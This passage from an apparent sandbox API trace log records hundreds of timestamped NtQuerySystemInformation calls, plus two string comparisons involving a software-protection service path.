SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0286.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0286.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0286.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0286.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0286.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0286.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0286.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0286.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0286.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0286.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0286.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0286.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0286.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0286.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0286.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0286.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0286.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0286.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0286.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0286.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0286.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0286.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0286.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0286.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0286.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0286.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0286.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0286.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0286.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0286.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0286.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0286.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0286.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0286.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0286.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0286.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0286.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0286.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0286.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0286.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0286.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0286.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0286.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0286.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0286.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d250, Length=0x28, ResultLength=0x0) [0286.392] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0286.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0286.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0286.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0286.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x28, ResultLength=0x0) [0286.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0286.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0286.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0286.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x20, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x20, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x20, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x20, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0286.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d250, Length=0x28, ResultLength=0x0) [0286.405] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0286.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0286.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0286.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.406] NtQuerySystemInformation 